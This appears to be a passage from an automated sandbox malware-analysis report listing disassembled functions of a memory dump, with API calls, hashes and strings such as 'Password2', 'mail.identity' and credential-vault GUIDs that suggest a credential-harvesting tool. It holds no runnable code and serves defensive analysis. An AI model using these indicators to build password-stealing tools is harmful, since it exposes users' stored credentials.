                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$_mbscpy
                                                                                                                  • String ID: Password2
                                                                                                                  • API String ID: 2600922555-1856559283
                                                                                                                  • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                  • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                  • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                                                  • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                  Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76270A60,?,00000000), ref: 00410D1C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                  • API String ID: 2574300362-543337301
                                                                                                                  • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                  • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                  • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                  • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                  Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: rows deleted
                                                                                                                  • API String ID: 2221118986-571615504
                                                                                                                  • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                  • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                  • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                  • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                  Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3384217055-0
                                                                                                                  • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                  • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                  • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                  • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                  Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1860491036-0
                                                                                                                  • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                  • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                  Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004048C2
                                                                                                                  • memset.MSVCRT ref: 004048D6
                                                                                                                  • memset.MSVCRT ref: 004048EA
                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 368790112-0
                                                                                                                  • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                  • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                  • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                  • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                  Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D2C2
                                                                                                                  • memset.MSVCRT ref: 0040D2D8
                                                                                                                  • memset.MSVCRT ref: 0040D2EA
                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                  • memset.MSVCRT ref: 0040D319
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 368790112-0
                                                                                                                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                  Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                  • too many SQL variables, xrefs: 0042C6FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                  • API String ID: 2221118986-515162456
                                                                                                                  • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                  • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                  • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                  • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                  Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                  • memset.MSVCRT ref: 004026AD
                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                    • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                    • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                  • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3503910906-0
                                                                                                                  • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                  • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                  • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                  • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                  Function 00407CBC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                    • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                  • free.MSVCRT ref: 00407D7C
                                                                                                                    • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                    • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`'v,00407A43,00000001,?,00000000,`'v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                    • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$mallocmemcpy
                                                                                                                  • String ID: `'v$`'v$`'v
                                                                                                                  • API String ID: 3401966785-538996858
                                                                                                                  • Opcode ID: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                                                                                                  • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                                                                                                  • Opcode Fuzzy Hash: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                                                                                                  • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96
                                                                                                                  Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C922
                                                                                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$MenuPostSendStringmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3798638045-0
                                                                                                                  • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                  • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                  • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                  • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                  Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                  • strlen.MSVCRT ref: 0040B60B
                                                                                                                  • atoi.MSVCRT(?,00000000,?,76270A60,?,00000000), ref: 0040B619
                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4107816708-0
                                                                                                                  • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                  • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                  Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: >$>$>
                                                                                                                  • API String ID: 39653677-3911187716
                                                                                                                  • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                  • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                  Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                  Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi
                                                                                                                  • String ID: C@$mail.identity
                                                                                                                  • API String ID: 1439213657-721921413
                                                                                                                  • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                  • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                  Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00406640
                                                                                                                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                  • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                  • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset$memcmp
                                                                                                                  • String ID: Ul@
                                                                                                                  • API String ID: 270934217-715280498
                                                                                                                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                  Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76270A60), ref: 00408EBE
                                                                                                                  • sprintf.MSVCRT ref: 0040B929
                                                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408E31
                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                  • sprintf.MSVCRT ref: 0040B953
                                                                                                                  • _mbscat.MSVCRT ref: 0040B966
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 203655857-0
                                                                                                                  • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                  • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                  • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                  • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                  Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040ADE8
                                                                                                                  • memset.MSVCRT ref: 0040ADFE
                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                  • sprintf.MSVCRT ref: 0040AE28
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                  • String ID: </%s>
                                                                                                                  • API String ID: 3699762281-259020660
                                                                                                                  • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
